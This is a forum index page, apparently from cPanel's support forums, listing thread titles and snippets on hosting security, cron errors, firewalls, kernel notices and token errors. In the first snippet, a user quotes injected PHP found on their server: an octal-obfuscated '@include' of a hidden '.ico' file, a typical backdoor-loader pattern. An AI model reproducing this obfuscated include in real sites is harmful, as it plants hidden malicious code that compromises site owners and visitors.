1. Radhi

    A problem I do not know have a solution

    Hello We have something that creates index files alone in files. Example <?php /ea2a0 / @include "\057home\057mzam\145er/p\165blic\137html\057Soun\144s/Al\055Jaze\145rah/\115oham\155ed_A\164eeq_\101l-Su\156awi/\056bfaf\06242b.\151co"; /ea2a0 / What solved this problem and where did it...
  2. J

    ModSecurity: collections_remove_stale: Failed to access DBM file

    We've looked at all the similar posts regarding this error, but all of the discussions apply to using mod_ruid2 or mpm_itk. We are using mpm_prefork & lsapi. Customer complained about not being able to consistently access his cPanel portal without having to reload the page, and sometimes...
  3. S

    Cant install my custom CSR

    Can anyone help me? I have my own custom CSR but I'm not able to install it on cpanel.
  4. W

    How to get email notification when kernel update is ready?

    Hi I would like to receive an email notification when a cpanel server needs a restart due to kernel update available? How can I enable that? Thanks
  5. R

    cPanel upgraded from Centos 6.8 to 7.7, what is new default firewall?

    I am using GoDaddy as my hosting provider. I just upgraded my service from their Gen3 VPS to a Gen4 VPS. The Gen3 VPS came with `ConfigServ Security & Firewall` - that is not available in the new Centos 7.7 Gen4 VPS. In fact, it appears there is no default FW of any sort in my new Gen4 VPS...
  6. P

    How to Improve Server Speed and Security.

    Sir how can I improve my server speed and security ? My Server's sites are working too much slow , is Thier any idea to increase Thier speed ?
  7. C

    Total Noob here - Cron issue

    We are receiving this message: /bin/sh: line 0: cd: /usr/local/cpanel/whostmgr/docroot/cgi/fantastico/scripts/: No such file or directory I have been asked to look into this but it is not my bailiwick. I'm happy to do the work if someone can clue me in on how to reset the script. I did search...
  8. D

    HTTP error 401Invalid Security TokenThe requested URL does not contain your session’s correct security token

    i get this error when am performing some functions like editng .htaccess or wp-config and alot more. below is the error i get; HTTP error 401 Invalid security token The requested URL does not contain the correct security token for your session. The reason for this error may be that you copied...
  9. A

    Keep getting alerts for "Software Security Notice - Script installs need upgrading" for non-existent installs

    Hello, I keep getting daily alerts for a WordPress installation, of which was originally created via cPanel, though no longer exists. Although it appears someone had deleted this by simply removing the physical files and database, cPanel must have a record somewhere through the Software...
  10. R

    Using Imunify360, but see this message "CSF is installed, but LFD is not running"

    I have Imunfy360 installed and CSF/LDF seem to be uninstalled. I see this message "CSF is installed, but LFD is not running" in the Security Advisor output. I realize the notice is not accurate and can be safely ignore it ( I double check for CSF/LDF via SSH, not installed ). Anything I can...
  11. L injected in all WHM Installations by cPanel Inc?

    It looks cPanel Inc. is delivering GoogleTagmanager Script inside WHM. I see that as a security risk and dataprivacy issue, when a thirdparty script is injected in the WHM console of every server. (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new...
  12. P

    Infected with a virus in a bunch of sites. Want to find a multi-line string and remove it from hundreds of files.

    I host a bunch of websites that got infected due to an insecure WordPress management plugin (InfiniteWP). I have WHM/cPanel, and ImunifyAV+ and ConfigServer Exploit Scanner. Those have failed to fully remove the injected scripts. ImunifyAV+ has removed a bunch, but for some reason, not all...
  13. S

    crond FAILED to open PAM security session (Permission denied)

    Hi, Yesterday, I noticed that cron Jobs stopped working. /var/log/cron logs: crond[13653]: (root) FAILED to open PAM security session (Permission denied) crond[13860]: (root) PAM ERROR (Permission denied) crond[13861]: (myuser) PAM ERROR (Permission denied) crond[13861]: (myuser) FAILED to...
  14. S

    SOLVED [CPANEL-26566] Security Advisor's PermitRootLogin check is inaccurate

    Just did cPanel upgrade to v80.0.9. Immediate issues I observed: 1) Security Advisor shows 'SSH direct root logins are permitted' and suggests 'Manually edit /etc/ssh/sshd_config and change PermitRootLogin to “without-password” or “no”, then restart SSH'. Note: my sshd_config was set to 'no'...
  15. S

    In Progress [CPANEL-25141] Force password change for users?

    Hi all, at some point I had enabled the feature that will force cpanel users to change their passwords after 6 months. Now I can not find where this feature is located, as I want to disable it - well at least temporarily. Also, when I will restore back this feature, is it possible to apply it...
  16. W

    In Progress [CPANEL-24474] Offer advice in the Security Advisor when the "KernelCare Gap" is in effect

    I also have a similar issue after updating the kernel Cron <[email protected]>/usr/bin/kcarectl --auto-update Unknown Kernel (CentOS Linux 3.10.0-957.1.3.el7.x86_64) EDIT: I have found this to be a kernelcare issue (not patched yet) and there's a post on their forum: Unknown Kernel (CentOS Linux...
  17. N

    In Progress [CPANEL-23606] cPanel Security Advisor missing kernel information when kernelcare is installed

    cPanel Security Advisor no more showing about Kernel version info about update.
  18. PeteS

    New kernel notification in Security Advisor

    Tipically Security Advisor sends me email notices when there is a newer kernel available. If memory serves me, the kernel had not been been installed already and it was prompting me to run yum update and reboot. Pretty straightforward.... 1- Am I correct in assuming that upcp runs a yum update...
  19. P

    User Name Security Reserved?

    So I had a site on the server with the username 'security' (automatically supplied by the install program). After the latest update, it vanished. I reinstalled from backup but it does not show in the list. I tried installing it new but the site exists in the apache configuration file so the...
  20. E

    cPanel + reverse proxy = invalid security token

    The system almost works, but I get the error in various places when logging into webmail and performing certain actions on WHM: HTTP error 401 Invalid Security Token Lots of XSRF errors in the console: Blocked a frame with origin "" from accessing a frame with...